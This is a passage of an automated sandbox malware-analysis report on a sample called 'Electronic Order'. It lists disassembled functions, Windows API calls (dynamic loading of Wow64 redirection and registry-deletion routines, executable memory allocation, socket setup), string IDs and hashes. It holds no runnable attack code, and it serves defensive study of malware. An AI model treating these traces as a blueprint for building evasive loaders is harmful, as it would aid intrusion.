                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: ab10ad309121ffd38cc61d60ea075e32d255dc051b6bc38e4c58d4542e29f6fb
                                      • Instruction ID: 2e21f74156cf92bd68a8a46588a88aadcbd54e19ab982884d54450ca5e0876c0
                                      • Opcode Fuzzy Hash: ab10ad309121ffd38cc61d60ea075e32d255dc051b6bc38e4c58d4542e29f6fb
                                      • Instruction Fuzzy Hash: 08518A20A0964986CB117726E90037E6FD4EB00384F28CD58E2D5832EFEE74CCD89A76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 2d433630c015ac5c1026d641fd4213107be9662ac912bf471614836d7c5c9c1b
                                      • Instruction ID: aa34c345b583f0c15aa2eb44dfe40e0132ddacea66cfc3c420de0491fbace08b
                                      • Opcode Fuzzy Hash: 2d433630c015ac5c1026d641fd4213107be9662ac912bf471614836d7c5c9c1b
                                      • Instruction Fuzzy Hash: 38513676104246CFDF15EF29D488AFA7BA4EF96314F184055E891AB2A0C7749CC2CB71
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: 66f3fe2f4ebbff89c06aaf930dc6acae39da1346442004f89d282d9db14d3f7f
                                      • Instruction ID: d7761ff814632c9615c2e6768cdc87ebd8ab039231c0e2e06dd78f79899e1155
                                      • Opcode Fuzzy Hash: 66f3fe2f4ebbff89c06aaf930dc6acae39da1346442004f89d282d9db14d3f7f
                                      • Instruction Fuzzy Hash: 9D51B171A043099BCB24DF65C8857EABBF4EF04314F24856FE64AD7241E771D684CBA0
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E4F910,00000000,?,?,?,?), ref: 00E47C4E
                                      • GetWindowLongW.USER32 ref: 00E47C6B
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E47C7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 1931a04e0e6721a6f45b0a1d7ad6ca077048daeb6e143113ff08d9af7b077684
                                      • Instruction ID: ca6ae4e0b2a3e11eef70f64d0deb54b920b255d30d7ba9ca36e5b264eefe3328
                                      • Opcode Fuzzy Hash: 1931a04e0e6721a6f45b0a1d7ad6ca077048daeb6e143113ff08d9af7b077684
                                      • Instruction Fuzzy Hash: 5831B231604206AFDB118F34EC45BEA77A9EB49328F205729F8B5B31E0C731E8519BA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E476D0
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E476E4
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E47708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: 4606e9890d282259c4a209a2f89eee1655ee49133ed2e4376f304f48a0e4740b
                                      • Instruction ID: c2c156f68a5345f7b09403dd60349fed62189231561c032734c3013e11df91c1
                                      • Opcode Fuzzy Hash: 4606e9890d282259c4a209a2f89eee1655ee49133ed2e4376f304f48a0e4740b
                                      • Instruction Fuzzy Hash: 3321EF32500218AFDF158EA4DC46FEA3BA9EB48714F111254FE557B1D0DBB1A8508BE0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E46FAA
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E46FBA
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E46FDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: ed4543ac39c4dd93d112469a2e5b003a90e0cac7612527c1657791ad8307c1ec
                                      • Instruction ID: 302e9a1c5a4337f48275ff0c9ded00f33d83ffb58b43f55efeec02374747f01a
                                      • Opcode Fuzzy Hash: ed4543ac39c4dd93d112469a2e5b003a90e0cac7612527c1657791ad8307c1ec
                                      • Instruction Fuzzy Hash: 3821C232710218BFDF118F54EC85FAB37AAEF8A758F019124F944AB190C671AC56CBA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E479E1
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E479F6
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E47A03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 0b01f0a59b7d3380f321010b8f3d8c267971d2246bddd2f687f752c863f3b346
                                      • Instruction ID: fe3fd35ba295e59cb9717c6e4802b6182075b98a951e44a4d642656eb4be9a40
                                      • Opcode Fuzzy Hash: 0b01f0a59b7d3380f321010b8f3d8c267971d2246bddd2f687f752c863f3b346
                                      • Instruction Fuzzy Hash: 8111C132654248BAEF149E61DC05FEB37A9EF89B68F024519FA45B6090D372A811DBA0
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4C2E), ref: 00DC4CA3
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DC4CB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: 15e280e7e9b7d2fe7d321a95c75fb0ac94d8f5159d058e3417a21d74b74c9f6e
                                      • Instruction ID: 5d6e88512d1d59948fbd7cd154bbc23187f31fcaaec2433fbe92e1985a057dba
                                      • Opcode Fuzzy Hash: 15e280e7e9b7d2fe7d321a95c75fb0ac94d8f5159d058e3417a21d74b74c9f6e
                                      • Instruction Fuzzy Hash: 82D01274511723CFD7205F31DA18A0676D5AF06B91B15883DD885E6660DA70D480C660
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4CE1,?), ref: 00DC4DA2
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC4DB4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 3c16b2854dc1e3dd20bbf514123456367b36ee230166ec502c2824e9f483d8bc
                                      • Instruction ID: 86eb22d21ba7d2169490417b27cbff1d58b8ac5eaa89c2d2576aa3311e3f961d
                                      • Opcode Fuzzy Hash: 3c16b2854dc1e3dd20bbf514123456367b36ee230166ec502c2824e9f483d8bc
                                      • Instruction Fuzzy Hash: 8ED01775950713CFD720AF32D818B4676E4AF06BA5B15C87ED8C6E6650EB70D880CA60
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DC4D2E,?,00DC4F4F,?,00E862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DC4D6F
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC4D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 75ee5af55effebd109810dc4f85f0c7cbd318836c25346bd9faa32cc4f029614
                                      • Instruction ID: 03f94c8c6778c2144ac334d441da265d3748674446bc52b9dd5a9940db5ec829
                                      • Opcode Fuzzy Hash: 75ee5af55effebd109810dc4f85f0c7cbd318836c25346bd9faa32cc4f029614
                                      • Instruction Fuzzy Hash: FFD01274510713CFD7205F31D818B1676D8BF16751B19C97DD887E6650D670D480CA60
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00E412C1), ref: 00E41080
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E41092
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: 17aa9ede0be1c2329b70aefe26e128b805cf4ff0f9b0c567ab252c625f1ff939
                                      • Instruction ID: 75e96c5497de0df606f18a87a70f09f8901574504fe86489bc267b40d4b04391
                                      • Opcode Fuzzy Hash: 17aa9ede0be1c2329b70aefe26e128b805cf4ff0f9b0c567ab252c625f1ff939
                                      • Instruction Fuzzy Hash: F4D0C230411352CFC7204F31E818A1672E4AF05751F01DC39E489F6260DB70C4C0C600
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E39009,?,00E4F910), ref: 00E39403
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E39415
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 09fd69cc65a6a4becc781cca1ff9a5fd50613ea6bb83414ae7f9cc540a9ab17a
                                      • Instruction ID: 2f74d6732a006ee5aeab835c70662a516ea5c3762a4b52fda4d3ef526ff2cd33
                                      • Opcode Fuzzy Hash: 09fd69cc65a6a4becc781cca1ff9a5fd50613ea6bb83414ae7f9cc540a9ab17a
                                      • Instruction Fuzzy Hash: 2ED0C234500313CFC7205F31DA4C50776D4AF02741F10D839D495F2651D7B0C480C610
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: dccbb38bc1f02b623fc7cb1b4701ede251428208e20870f9a08ee2a0e5b2ef1c
                                      • Instruction ID: 423b444c32da0159421d823b1078dc5f4a9fff3f22f0c8aae56f166c59e3f54f
                                      • Opcode Fuzzy Hash: dccbb38bc1f02b623fc7cb1b4701ede251428208e20870f9a08ee2a0e5b2ef1c
                                      • Instruction Fuzzy Hash: FED01275804119EACB149A918C88DF9777CE744301F5425D2F506B6080F3749BC59F35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc9868469739cb9d5f008a8258c3d162c3c388a01a0468d50078fe65e55e9510
                                      • Instruction ID: 0ab8f6441890e302e9e5ad7914838dd267bf6f6ab90ac3aec8aee787f7fe4583
                                      • Opcode Fuzzy Hash: fc9868469739cb9d5f008a8258c3d162c3c388a01a0468d50078fe65e55e9510
                                      • Instruction Fuzzy Hash: B1C17E74A04216EFCB14CF94C884EAEB7F5FF88B14B119599E885EB251D730EE81CB90
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 00E3E3D2
                                      • CharLowerBuffW.USER32(?,?), ref: 00E3E415
                                        • Part of subcall function 00E3DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E3DAD9
                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E3E615
                                      • _memmove.LIBCMT ref: 00E3E628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                      • String ID:
                                      • API String ID: 3659485706-0
                                      • Opcode ID: f1742fdde47fa508c8962f0c81f52bd8312ee5a71a77996ea811d0bafe77aeb8
                                      • Instruction ID: 61d79c59099c8574e82e22e78db72a980bddc337322fa5fcda132211350610a0
                                      • Opcode Fuzzy Hash: f1742fdde47fa508c8962f0c81f52bd8312ee5a71a77996ea811d0bafe77aeb8
                                      • Instruction Fuzzy Hash: 8BC15A716083019FC714DF28C484A6ABBE4FF88718F14896DF899AB391D771E946CF92
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E383D8
                                      • CoUninitialize.OLE32 ref: 00E383E3
                                        • Part of subcall function 00E1DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E1DAC5
                                      • VariantInit.OLEAUT32(?), ref: 00E383EE
                                      • VariantClear.OLEAUT32(?), ref: 00E386BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 32d64a81d98ea7f4d8a223388d2b4a9604fbf329b6f5901067e2a186c58bc38b
                                      • Instruction ID: 176868bef721b92efc71298109e4f39493376c0c24dc69acc42c1d2953eda8d6
                                      • Opcode Fuzzy Hash: 32d64a81d98ea7f4d8a223388d2b4a9604fbf329b6f5901067e2a186c58bc38b
                                      • Instruction Fuzzy Hash: CCA114752047029FCB10DF25C999B5ABBE4BF88714F15544CF99AAB3A1CB30ED05CB62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: a7c569fe6605c3b03562c490d089dd2477196d6b1dd3a358d47ddce00231a953
                                      • Instruction ID: 02c746ca74fe103407e6ca3e914d8cd22bdce7a2f3f2358c782c4635dd960b75
                                      • Opcode Fuzzy Hash: a7c569fe6605c3b03562c490d089dd2477196d6b1dd3a358d47ddce00231a953
                                      • Instruction Fuzzy Hash: E85196747043029ADB20AF65D495BE9B3F5EF4C710F20A81FE596EB291DE70D8C19B11
                                      APIs
                                      • GetWindowRect.USER32(015AEA70,?), ref: 00E49AD2
                                      • ScreenToClient.USER32(00000002,00000002), ref: 00E49B05
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E49B72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: dd64c30067dd3e5b8129e4abad31b604ec2f0146c08a225ddb8a6d6c3c81d509
                                      • Instruction ID: 2e49763e1e46a6941c75c1a4fd627761498307bfa7fc07ca7441d2c46ee0dde6
                                      • Opcode Fuzzy Hash: dd64c30067dd3e5b8129e4abad31b604ec2f0146c08a225ddb8a6d6c3c81d509
                                      • Instruction Fuzzy Hash: B9514D34A00209EFCF14DF68E881AAE7BB5FF45324F108259F819BB2A1D730AD41DB94
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00E36CE4
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36CF4
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E36D58
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36D64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: 7e90f517339d4b8aca4f30542dc34bd099d4aba509d5a19c5f4715c86169973f
